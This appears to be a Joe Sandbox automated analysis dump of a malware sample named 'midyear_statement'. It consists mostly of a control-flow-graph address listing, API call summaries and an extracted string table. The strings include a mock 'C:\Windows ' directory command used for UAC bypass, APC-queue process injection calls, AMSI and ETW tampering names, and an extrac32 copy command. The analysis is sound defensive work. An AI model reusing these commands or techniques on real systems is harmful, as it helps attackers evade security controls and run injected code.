40c7c34 35645->35652 35649 40b7b88 17 API calls 35646->35649 35654 40c687c CreateProcessAsUserW 35647->35654 35648->35644 35650 40a47d0 11 API calls 35648->35650 35651 40c5d39 35649->35651 35661 40c747e 35650->35661 35653 40a47d0 11 API calls 35651->35653 35658 40a475c 11 API calls 35652->35658 35662 40c5d5a 35653->35662 35655 40c688e 35654->35655 35656 40c690a 35654->35656 35657 40a47d0 11 API calls 35655->35657 35659 40a47d0 11 API calls 35656->35659 35660 40c68af 35657->35660 
35667 40c7c6b 35658->35667 35665 40c692b 35659->35665 35663 40c68ba 35660->35663 35664 40a475c 11 API calls 35661->35664 35666 40a475c 11 API calls 35662->35666 35669 40a475c 11 API calls 35663->35669 35672 40c74b5 35664->35672 35668 40a475c 11 API calls 35665->35668 35675 40c5d91 35666->35675 35670 40b7b88 17 API calls 35667->35670 35679 40c6962 35668->35679 35671 40c68e6 35669->35671 35673 40c7c8f 35670->35673 35676 40c68f1 35671->35676 35677 40b7b88 17 API calls 35672->35677 35674 40a47d0 11 API calls 35673->35674 35683 40c7cb0 35674->35683 35680 40b7b88 17 API calls 35675->35680 35686 40b7b88 17 API calls 35676->35686 35678 40c74d9 35677->35678 35681 40a47d0 11 API calls 35678->35681 35684 40b7b88 17 API calls 35679->35684 35682 40c5db5 35680->35682 35690 40c74fa 35681->35690 35685 40a47d0 11 API calls 35682->35685 35688 40a475c 11 API calls 35683->35688 35687 40c6986 35684->35687 35691 40c5dd6 35685->35691 35686->35656 35689 40a47d0 11 API calls 35687->35689 35695 40c7ce7 35688->35695 35693 40c69a7 35689->35693 35692 40a475c 11 API calls 35690->35692 35694 40a475c 11 API calls 35691->35694 35698 40c7531 35692->35698 35696 40a475c 11 API calls 35693->35696 35700 40c5e0d 35694->35700 35697 40b7b88 17 API calls 35695->35697 35703 40c69de 35696->35703 35699 40c7d0b 35697->35699 35702 40b7b88 17 API calls 35698->35702 35701 40a47d0 11 API calls 35699->35701 35704 40b7b88 17 API calls 35700->35704 35708 40c7d2c 35701->35708 35705 40c7555 35702->35705 35709 40b7b88 17 API calls 35703->35709 35706 40c5e31 35704->35706 35707 40a47d0 11 API calls 35705->35707 35713 40a47d0 11 API calls 35706->35713 35714 40c7576 35707->35714 35711 40a475c 11 API calls 35708->35711 35710 40c6a02 35709->35710 35715 40a4968 11 API calls 35710->35715 35719 40c7d63 35711->35719 35718 40c5e71 35713->35718 35717 40a475c 11 API calls 35714->35717 35716 40c6a26 35715->35716 35720 40a47d0 11 API calls 35716->35720 35723 40c75ad 35717->35723 35721 40a475c 11 API calls 35718->35721 35722 40b7b88 17 
API calls 35719->35722 35724 40c6a55 35720->35724 35726 40c5ea8 35721->35726 35728 40c7d87 35722->35728 35725 40b7b88 17 API calls 35723->35725 35729 40a475c 11 API calls 35724->35729 35727 40c75d1 35725->35727 35732 40b7b88 17 API calls 35726->35732 36250 40bd418 35727->36250 35731 40b7b88 17 API calls 35728->35731 35737 40c6a8c 35729->35737 35738 40c7dba 35731->35738 35734 40c5ecc 35732->35734 35736 40a47d0 11 API calls 35734->35736 35735 40a47d0 11 API calls 35739 40c7615 35735->35739 35743 40c5eed 35736->35743 35740 40b7b88 17 API calls 35737->35740 35741 40b7b88 17 API calls 35738->35741 35744 40a47d0 11 API calls 35739->35744 35742 40c6ab0 35740->35742 35747 40c7ded 35741->35747 35745 40a47d0 11 API calls 35742->35745 35746 40a475c 11 API calls 35743->35746 35749 40c764d 35744->35749 35748 40c6ad1 35745->35748 35750 40c5f24 35746->35750 35751 40b7b88 17 API calls 35747->35751 35752 40a475c 11 API calls 35748->35752 35753 40a475c 11 API calls 35749->35753 35754 40b7b88 17 API calls 35750->35754 35756 40c7e20 35751->35756 35758 40c6b08 35752->35758 35759 40c7684 35753->35759 35755 40c5f48 35754->35755 35757 40a47d0 11 API calls 35755->35757 35760 40b7b88 17 API calls 35756->35760 35767 40c5f69 35757->35767 35763 40b7b88 17 API calls 35758->35763 35761 40b7b88 17 API calls 35759->35761 35762 40c7e53 35760->35762 35764 40c76a8 35761->35764 35765 40a47d0 11 API calls 35762->35765 35766 40c6b2c 35763->35766 35768 40a47d0 11 API calls 35764->35768 35771 40c7e74 35765->35771 35769 40a47d0 11 API calls 35766->35769 35770 40a475c 11 API calls 35767->35770 35773 40c76c9 35768->35773 35772 40c6b4d 35769->35772 35774 40c5fa0 35770->35774 35775 40a475c 11 API calls 35771->35775 35776 40a475c 11 API calls 35772->35776 35777 40a475c 11 API calls 35773->35777 35778 40b7b88 17 API calls 35774->35778 35780 40c7eab 35775->35780 35781 40c6b84 35776->35781 35783 40c7700 35777->35783 35779 40c5fc4 35778->35779 36658 40b5a30 42 API calls 35779->36658 35784 40b7b88 17 API calls 
35780->35784 35787 40b7b88 17 API calls 35781->35787 35788 40b7b88 17 API calls 35783->35788 35786 40c7ecf 35784->35786 35785 40c5ff0 35794 40a4b3c 11 API calls 35785->35794 35790 40a47d0 11 API calls 35786->35790 35791 40c6ba8 35787->35791 35789 40c7724 35788->35789 36257 40a7dd4 35789->36257 35803 40c7ef0 35790->35803 36660 40bc20c 24 API calls 35791->36660 35797 40c6005 35794->35797 35796 40c6bbc 35799 40a47d0 11 API calls 35796->35799 35800 40a47d0 11 API calls 35797->35800 35798 40c7a0d 35802 40a47d0 11 API calls 35798->35802 35805 40c6be2 35799->35805 35806 40c6026 35800->35806 35801 40a47d0 11 API calls 35807 40c7757 35801->35807 35808 40c7a2e 35802->35808 35804 40a475c 11 API calls 35803->35804 35813 40c7f27 35804->35813 35809 40a475c 11 API calls 35805->35809 35810 40a475c 11 API calls 35806->35810 35811 40a475c 11 API calls 35807->35811 35812 40a475c 11 API calls 35808->35812 35815 40c6c19 35809->35815 35816 40c605d 35810->35816 35820 40c778e 35811->35820 35818 40c7a65 35812->35818 35814 40b7b88 17 API calls 35813->35814 35817 40c7f4b 35814->35817 35821 40b7b88 17 API calls 35815->35821 35822 40b7b88 17 API calls 35816->35822 35819 40a47d0 11 API calls 35817->35819 35824 40b7b88 17 API calls 35818->35824 35832 40c7f6c 35819->35832 35823 40b7b88 17 API calls 35820->35823 35825 40c6c3d 35821->35825 35826 40c6081 35822->35826 35827 40c77b2 35823->35827 35828 40c7a89 35824->35828 35829 40a47d0 11 API calls 35825->35829 35833 40a4968 11 API calls 35826->35833 35830 40a47d0 11 API calls 35827->35830 35831 40a47d0 11 API calls 35828->35831 35837 40c6c5e 35829->35837 35838 40c77d3 35830->35838 35839 40c7aaa 35831->35839 35834 40a475c 11 API calls 35832->35834 35835 40c609e RtlMoveMemory 35833->35835 35843 40c7fa3 35834->35843 35836 40a47d0 11 API calls 35835->35836 35844 40c60c5 35836->35844 35840 40a475c 11 API calls 35837->35840 35841 40a475c 11 API calls 35838->35841 35842 40a475c 11 API calls 35839->35842 35846 40c6c95 35840->35846 35848 40c780a 35841->35848 
35849 40c7ae1 35842->35849 35845 40b7b88 17 API calls 35843->35845 35847 40a475c 11 API calls 35844->35847 35852 40c7fc7 35845->35852 35850 40b7b88 17 API calls 35846->35850 35857 40c60fc 35847->35857 35854 40b7b88 17 API calls 35848->35854 35851 40b7b88 17 API calls 35849->35851 35853 40c6cb9 35850->35853 35855 40c7b05 35851->35855 35861 40b7b88 17 API calls 35852->35861 35856 40a47d0 11 API calls 35853->35856 35858 40c782e 35854->35858 35860 40a47d0 11 API calls 35855->35860 35864 40c6cda 35856->35864 35862 40b7b88 17 API calls 35857->35862 35859 40a47d0 11 API calls 35858->35859 35866 40c784f 35859->35866 35867 40c7b26 35860->35867 35868 40c7ffa 35861->35868 35863 40c6120 35862->35863 35865 40a47d0 11 API calls 35863->35865 35869 40a475c 11 API calls 35864->35869 35873 40c6141 35865->35873 35870 40a475c 11 API calls 35866->35870 35871 40a475c 11 API calls 35867->35871 35872 40b7b88 17 API calls 35868->35872 35874 40c6d11 35869->35874 35876 40c7886 35870->35876 35877 40c7b5d 35871->35877 35878 40c802d 35872->35878 35875 40a475c 11 API calls 35873->35875 35879 40b7b88 17 API calls 35874->35879 35886 40c6178 35875->35886 35881 40b7b88 17 API calls 35876->35881 35882 40b7b88 17 API calls 35877->35882 35883 40b7b88 17 API calls 35878->35883 35880 40c6d35 35879->35880 35884 40c6d3e NtQueueApcThread 35880->35884 35885 40c6d55 35880->35885 35887 40c78aa 35881->35887 35888 40c7b81 35882->35888 35895 40c8060 35883->35895 35884->35885 35890 40a47d0 11 API calls 35885->35890 35892 40b7b88 17 API calls 35886->35892 36261 40bd070 35887->36261 35889 40a47d0 11 API calls 35888->35889 35900 40c7ba2 35889->35900 35902 40c6d76 35890->35902 35896 40c619c 35892->35896 35894 40a44c4 11 API calls 35897 40c78cf 35894->35897 35901 40b7b88 17 API calls 35895->35901 35898 40a47d0 11 API calls 35896->35898 35899 40a47d0 11 API calls 35897->35899 35905 40c61bd 35898->35905 35906 40c78f0 35899->35906 35903 40a475c 11 API calls 35900->35903 35907 40c8093 35901->35907 35904 40a475c 11 API 
calls 35902->35904 35911 40c7bd9 35903->35911 35909 40c6dad 35904->35909 35908 40a475c 11 API calls 35905->35908 35910 40a475c 11 API calls 35906->35910 35912 40b7b88 17 API calls 35907->35912 35918 40c61f4 35908->35918 35914 40b7b88 17 API calls 35909->35914 35921 40c7927 35910->35921 35915 40b7b88 17 API calls 35911->35915 35913 40c80c6 35912->35913 35916 40a47d0 11 API calls 35913->35916 35917 40c6dd1 35914->35917 35919 40c7bfd 35915->35919 35926 40c80e7 35916->35926 35920 40a47d0 11 API calls 35917->35920 35923 40b7b88 17 API calls 35918->35923 36281 40a4968 35919->36281 35933 40c6df2 35920->35933 35928 40b7b88 17 API calls 35921->35928 35927 40c6218 35923->35927 35932 40a475c 11 API calls 35926->35932 35929 40a47d0 11 API calls 35927->35929 35930 40c794b 35928->35930 35935 40c6239 35929->35935 35931 40a47d0 11 API calls 35930->35931 35936 40c796c 35931->35936 35937 40c811e 35932->35937 35934 40a475c 11 API calls 35933->35934 35939 40c6e29 35934->35939 35938 40a475c 11 API calls 35935->35938 35940 40a475c 11 API calls 35936->35940 35941 40b7b88 17 API calls 35937->35941 35946 40c6270 35938->35946 35943 40b7b88 17 API calls 35939->35943 35948 40c79a3 35940->35948 35942 40c8142 35941->35942 35944 40a47d0 11 API calls 35942->35944 35945 40c6e4d 35943->35945 35952 40c8163 35944->35952 35947 40a47d0 11 API calls 35945->35947 35949 40b7b88 17 API calls 35946->35949 35955 40c6e6e 35947->35955 35951 40b7b88 17 API calls 35948->35951 35950 40c6294 35949->35950 36659 40ba160 56 API calls 35950->36659 35959 40c79c7 35951->35959 35954 40a475c 11 API calls 35952->35954 35958 40c819a 35954->35958 35956 40a475c 11 API calls 35955->35956 35962 40c6ea5 35956->35962 35957 40c62a5 35961 40b7b88 17 API calls 35958->35961 36266 40bcd1c 35959->36266 35966 40c81be 35961->35966 35963 40b7b88 17 API calls 35962->35963 35964 40c6ec9 ResumeThread 35963->35964 35965 40a47d0 11 API calls 35964->35965 35969 40c6ef5 35965->35969 35967 40b7b88 17 API calls 35966->35967 35968 40c81f1 
35967->35968 35970 40a47d0 11 API calls 35968->35970 35971 40a475c 11 API calls 35969->35971 35972 40c8212 35970->35972 35974 40c6f2c 35971->35974 35973 40a475c 11 API calls 35972->35973 35978 40c8249 35973->35978 35975 40b7b88 17 API calls 35974->35975 35976 40c6f50 35975->35976 35977 40a47d0 11 API calls 35976->35977 35981 40c6f71 35977->35981 35979 40b7b88 17 API calls 35978->35979 35980 40c826d 35979->35980 35982 40a47d0 11 API calls 35980->35982 35983 40a475c 11 API calls 35981->35983 35984 40c828e 35982->35984 35986 40c6fa8 35983->35986 35985 40a475c 11 API calls 35984->35985 35989 40c82c5 35985->35989 35987 40b7b88 17 API calls 35986->35987 35988 40c6fcc 35987->35988 35990 40a47d0 11 API calls 35988->35990 35991 40b7b88 17 API calls 35989->35991 35993 40c6fed 35990->35993 35992 40c82e9 35991->35992 35994 40a47d0 11 API calls 35992->35994 35995 40a475c 11 API calls 35993->35995 35996 40c830a 35994->35996 35998 40c7024 35995->35998 35997 40a475c 11 API calls 35996->35997 36001 40c8341 35997->36001 35999 40b7b88 17 API calls 35998->35999 36000 40c7048 CloseHandle 35999->36000 36002 40a47d0 11 API calls 36000->36002 36003 40b7b88 17 API calls 36001->36003 36004 40c7074 36002->36004 36006 40c8365 36003->36006 36005 40a475c 11 API calls 36004->36005 36008 40c70ab 36005->36008 36007 40b7b88 17 API calls 36006->36007 36009 40c8398 36007->36009 36010 40b7b88 17 API calls 36008->36010 36012 40b7b88 17 API calls 36009->36012 36011 40c70cf 36010->36011 36013 40a47d0 11 API calls 36011->36013 36014 40c83cb 36012->36014 36015 40c70f0 36013->36015 36017 40b7b88 17 API calls 36014->36017 36016 40a475c 11 API calls 36015->36016 36018 40c7127 36016->36018 36019 40c83fe 36017->36019 36020 40b7b88 17 API calls 36018->36020 36021 40b7b88 17 API calls 36019->36021 36022 40c714b 36020->36022 36023 40c8431 36021->36023 36025 40a47d0 11 API calls 36022->36025 36024 40a47d0 11 API calls 36023->36024 36026 40c8452 36024->36026 36027 40c716c 36025->36027 36028 40a475c 11 API calls 
36026->36028 36029 40a475c 11 API calls 36027->36029 36031 40c8489 36028->36031 36030 40c71a3 36029->36030 36032 40b7b88 17 API calls 36030->36032 36033 40b7b88 17 API calls 36031->36033 36034 40c71c7 36032->36034 36035 40c84ad 36033->36035 36036 40a47d0 11 API calls 36034->36036 36037 40a47d0 11 API calls 36035->36037 36039 40c71e8 36036->36039 36038 40c84ce 36037->36038 36040 40a475c 11 API calls 36038->36040 36041 40a475c 11 API calls 36039->36041 36043 40c8505 36040->36043 36042 40c721f 36041->36042 36044 40b7b88 17 API calls 36042->36044 36045 40b7b88 17 API calls 36043->36045 36046 40c7243 36044->36046 36048 40c8529 36045->36048 36047 40a47d0 11 API calls 36046->36047 36050 40c7264 36047->36050 36049 40b7b88 17 API calls 36048->36049 36052 40c855c 36049->36052 36051 40a475c 11 API calls 36050->36051 36054 40c729b 36051->36054 36053 40b7b88 17 API calls 36052->36053 36056 40c858f 36053->36056 36055 40b7b88 17 API calls 36054->36055 36055->35584 36057 40b7b88 17 API calls 36056->36057 36058 40c85c2 36057->36058 36059 40b7b88 17 API calls 36058->36059 36060 40c85f5 36059->36060 36061 40b7b88 17 API calls 36060->36061 36062 40c8628 36061->36062 36063 40a47d0 11 API calls 36062->36063 36064 40c8649 36063->36064 36065 40a475c 11 API calls 36064->36065 36066 40c8680 36065->36066 36067 40b7b88 17 API calls 36066->36067 36068 40c86a4 36067->36068 36069 40a47d0 11 API calls 36068->36069 36070 40c86c5 36069->36070 36071 40a475c 11 API calls 36070->36071 36072 40c86fc 36071->36072 36073 40b7b88 17 API calls 36072->36073 36074 40c8720 36073->36074 36075 40a47d0 11 API calls 36074->36075 36076 40c8741 36075->36076 36077 40a475c 11 API calls 36076->36077 36078 40c8778 36077->36078 36079 40b7b88 17 API calls 36078->36079 36080 40c879c 36079->36080 36081 40a47d0 11 API calls 36080->36081 36082 40c87bd 36081->36082 36083 40a475c 11 API calls 36082->36083 36084 40c87f4 36083->36084 36085 40b7b88 17 API calls 36084->36085 36086 40c8818 36085->36086 36087 40a47d0 11 API calls 
36086->36087 36088 40c8839 36087->36088 36089 40a475c 11 API calls 36088->36089 36090 40c8870 36089->36090 36091 40b7b88 17 API calls 36090->36091 36092 40c8894 36091->36092 36093 40b7b88 17 API calls 36092->36093 36094 40c88a3 36093->36094 36095 40b7b88 17 API calls 36094->36095 36096 40c88b2 36095->36096 36097 40b7b88 17 API calls 36096->36097 36098 40c88c1 36097->36098 36099 40b7b88 17 API calls 36098->36099 36100 40c88d0 36099->36100 36101 40b7b88 17 API calls 36100->36101 36102 40c88df 36101->36102 36103 40b7b88 17 API calls 36102->36103 36104 40c88ee 36103->36104 36105 40b7b88 17 API calls 36104->36105 36106 40c88fd 36105->36106 36107 40b7b88 17 API calls 36106->36107 36108 40c890c 36107->36108 36109 40b7b88 17 API calls 36108->36109 36110 40c891b 36109->36110 36111 40b7b88 17 API calls 36110->36111 36112 40c892a 36111->36112 36113 40b7b88 17 API calls 36112->36113 36114 40c8939 36113->36114 36115 40b7b88 17 API calls 36114->36115 36116 40c8948 36115->36116 36117 40b7b88 17 API calls 36116->36117 36118 40c8957 36117->36118 36119 40b7b88 17 API calls 36118->36119 36120 40c8966 36119->36120 36121 40b7b88 17 API calls 36120->36121 36122 40c8975 36121->36122 36123 40a47d0 11 API calls 36122->36123 36124 40c8996 36123->36124 36125 40a475c 11 API calls 36124->36125 36126 40c89cd 36125->36126 36127 40b7b88 17 API calls 36126->36127 36128 40c89f1 36127->36128 36129 40a47d0 11 API calls 36128->36129 36130 40c8a12 36129->36130 36131 40a475c 11 API calls 36130->36131 36132 40c8a49 36131->36132 36133 40b7b88 17 API calls 36132->36133 36134 40c8a6d 36133->36134 36135 40a47d0 11 API calls 36134->36135 36136 40c8a8e 36135->36136 36137 40a475c 11 API calls 36136->36137 36138 40c8ac5 36137->36138 36139 40b7b88 17 API calls 36138->36139 36140 40c8ae9 36139->36140 36141 40b7b88 17 API calls 36140->36141 36142 40c8b1c 36141->36142 36143 40b7b88 17 API calls 36142->36143 36144 40c8b4f 36143->36144 36145 40b7b88 17 API calls 36144->36145 36146 40c8b82 36145->36146 36147 40b7b88 17 
API calls 36146->36147 36148 40c8bb5 36147->36148 36149 40b7b88 17 API calls 36148->36149 36150 40c8be8 36149->36150 36151 40b7b88 17 API calls 36150->36151 36152 40c8c1b 36151->36152 36153 40b7b88 17 API calls 36152->36153 36154 40c8c4e 36153->36154 36155 40a47d0 11 API calls 36154->36155 36156 40c8c6f 36155->36156 36157 40a475c 11 API calls 36156->36157 36158 40c8ca6 36157->36158 36159 40b7b88 17 API calls 36158->36159 36160 40c8cca 36159->36160 36161 40a47d0 11 API calls 36160->36161 36162 40c8ceb 36161->36162 36163 40a475c 11 API calls 36162->36163 36164 40c8d22 36163->36164 36165 40b7b88 17 API calls 36164->36165 36166 40c8d46 36165->36166 36167 40a47d0 11 API calls 36166->36167 36168 40c8d67 36167->36168 36169 40a475c 11 API calls 36168->36169 36170 40c8d9e 36169->36170 36171 40b7b88 17 API calls 36170->36171 36172 40c8dc2 36171->36172 36173 40b7b88 17 API calls 36172->36173 36174 40c8df5 36173->36174 36175 40b7b88 17 API calls 36174->36175 36176 40c8e28 36175->36176 36177 40b7b88 17 API calls 36176->36177 36178 40c8e5b 36177->36178 36179 40b7b88 17 API calls 36178->36179 36180 40c8e8e 36179->36180 36181 40b7b88 17 API calls 36180->36181 36182 40c8ec1 36181->36182 36183 40b7b88 17 API calls 36182->36183 36184 40c8ef4 36183->36184 36185 40b7b88 17 API calls 36184->36185 36186 40c8f27 36185->36186 36187 40b7b88 17 API calls 36186->36187 36188 40c8f5a 36187->36188 36189 40b7b88 17 API calls 36188->36189 36190 40c8f8d 36189->36190 36191 40b7b88 17 API calls 36190->36191 36192 40c8fc0 36191->36192 36193 40b7b88 17 API calls 36192->36193 36194 40c8ff3 36193->36194 36195 40b7b88 17 API calls 36194->36195 36196 40c9026 36195->36196 36197 40b7b88 17 API calls 36196->36197 36198 40c9059 36197->36198 36199 40b7b88 17 API calls 36198->36199 36200 40c908c 36199->36200 36201 40b7b88 17 API calls 36200->36201 36202 40c90bf 36201->36202 36203 40b7b88 17 API calls 36202->36203 36204 40c90f2 36203->36204 36205 40b7b88 17 API calls 36204->36205 36206 40c9125 36205->36206 36207 
APIs
• InetIsOffline.URL(00000000,00000000,040C9731,?,?,?,000002EC,00000000,00000000), ref: 040BD885
  • Part of subcall function 040B7B88: LoadLibraryW.KERNEL32(?,00000000,040B7C3A), ref: 040B7BB8
  • Part of subcall function 040B7B88: GetModuleHandleW.KERNEL32(?,?,00000000,040B7C3A), ref: 040B7BBE
  • Part of subcall function 040B7B88: GetProcAddress.KERNEL32(00000000,00000000), ref: 040B7BD7
  • Part of subcall function 040A7DD4: GetFileAttributesA.KERNEL32(00000000,?,040BE36F,ScanString,04100344,040C9768,OpenSession,04100344,040C9768,ScanString,04100344,040C9768,UacScan,04100344,040C9768,UacInitialize), ref: 040A7DDF
  • Part of subcall function 040AC2A8: GetModuleFileNameA.KERNEL32(00000000,?,00000105,041F4874,?,040BE690,ScanBuffer,04100344,040C9768,OpenSession,04100344,040C9768,ScanBuffer,04100344,040C9768,OpenSession), ref: 040AC2BF
  • Part of subcall function 040BCE00: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,040BCED0), ref: 040BCE3B
  • Part of subcall function 040BCE00: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,040BCED0), ref: 040BCE6B
  • Part of subcall function 040BCE00: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 040BCE80
  • Part of subcall function 040BCE00: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 040BCEAC
  • Part of subcall function 040BCE00: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 040BCEB5
  • Part of subcall function 040A7DF8: GetFileAttributesA.KERNEL32(00000000,?,040C13B4,ScanString,04100344,040C9768,OpenSession,04100344,040C9768,OpenSession,04100344,040C9768,ScanBuffer,04100344,040C9768,ScanString), ref: 040A7E03
  • Part of subcall function 040A7F8C: CreateDirectoryA.KERNEL32(00000000,00000000,?,040C15A5,ScanBuffer,04100344,040C9768,OpenSession,04100344,040C9768,Initialize,04100344,040C9768,ScanString,04100344,040C9768), ref: 040A7F99
• WinExec.KERNEL32(cmd /c mkdir "\\?\C:\Windows ",00000000), ref: 040C1BD4
• WinExec.KERNEL32(cmd /c mkdir "\\?\C:\Windows \System32",00000000), ref: 040C1D54
• Sleep.KERNEL32(00000BB8,ScanString,04100344,040C9768,cmd /c mkdir "\\?\C:\Windows \System32",00000000,ScanBuffer,04100344,040C9768,UacInitialize,04100344,040C9768,Initialize,04100344,040C9768,cmd /c mkdir "\\?\C:\Windows "), ref: 040C1DDA
Strings
Memory Dump Source
• Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
• Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
Yara matches
Similarity
• API ID: File$AttributesExecModuleNamePath$AddressCloseCreateDirectoryHandleInetInformationLibraryLoadName_OfflineOpenProcQueryReadSleep
• String ID: .url$@^@$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\Libraries$C:\Windows \System32$C:\Windows\SysWOW64$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\extrac32.exe /C /Y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$DEEX$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$^^Nc$acS$bcrypt$can$cmd /c mkdir "\\?\C:\Windows "$cmd /c mkdir "\\?\C:\Windows \System32"$endpointdlp$http$ieproxy$iexpress.exe$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
• API String ID: 1211517183-1152008110
• Opcode ID: 2710da127c0b3e98bba154cd7beddb25790be6b4e2a361d828fe0410ac40a52f
• Instruction ID: 213aead65e13e92fdf7a95f22218548a0f2287178da34d518b3413bf257e789e
• Opcode Fuzzy Hash: 2710da127c0b3e98bba154cd7beddb25790be6b4e2a361d828fe0410ac40a52f
• Instruction Fuzzy Hash: 8914DB38A411598FEB10EBA4D980ECEB3B9EF8570CF5446E5A008BB614DB74BE95CF41
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 040B7B88: LoadLibraryW.KERNEL32(?,00000000,040B7C3A), ref: 040B7BB8
                                                                                                                                                                                            • Part of subcall function 040B7B88: GetModuleHandleW.KERNEL32(?,?,00000000,040B7C3A), ref: 040B7BBE
                                                                                                                                                                                            • Part of subcall function 040B7B88: GetProcAddress.KERNEL32(00000000,00000000), ref: 040B7BD7
                                                                                                                                                                                          • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,041F4798,041F47DC,OpenSession,04100344,040C9768,UacScan,04100344), ref: 040C6885
                                                                                                                                                                                          • NtQueueApcThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,00000000,ScanBuffer,04100344,040C9768,OpenSession,04100344,040C9768,UacScan,04100344,040C9768,ScanBuffer,04100344), ref: 040C6D50
                                                                                                                                                                                          • ResumeThread.KERNEL32(00000000,ScanBuffer,04100344,040C9768,OpenSession,04100344,040C9768,UacScan,04100344,040C9768,ScanBuffer,04100344,040C9768,OpenSession,04100344,040C9768), ref: 040C6ECF
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,ScanBuffer,04100344,040C9768,OpenSession,04100344,040C9768,UacScan,04100344,040C9768,00000000,ScanBuffer,04100344,040C9768,OpenSession,04100344), ref: 040C704E
                                                                                                                                                                                            • Part of subcall function 040A7DD4: GetFileAttributesA.KERNEL32(00000000,?,040BE36F,ScanString,04100344,040C9768,OpenSession,04100344,040C9768,ScanString,04100344,040C9768,UacScan,04100344,040C9768,UacInitialize), ref: 040A7DDF
                                                                                                                                                                                            • Part of subcall function 040BCD1C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,040BCDEE), ref: 040BCD5B
                                                                                                                                                                                            • Part of subcall function 040BCD1C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 040BCD95
                                                                                                                                                                                            • Part of subcall function 040BCD1C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 040BCDC2
                                                                                                                                                                                            • Part of subcall function 040BCD1C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 040BCDCB
                                                                                                                                                                                          • ExitProcess.KERNEL32(00000000,ScanBuffer,04100344,040C9768,Initialize,04100344,040C9768,OpenSession,04100344,040C9768,ScanString,04100344,040C9768,OpenSession,04100344,040C9768), ref: 040C9301
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CloseCreateHandlePathProcessThread$AddressAttributesExitLibraryLoadModuleNameName_ProcQueueResumeUserWrite
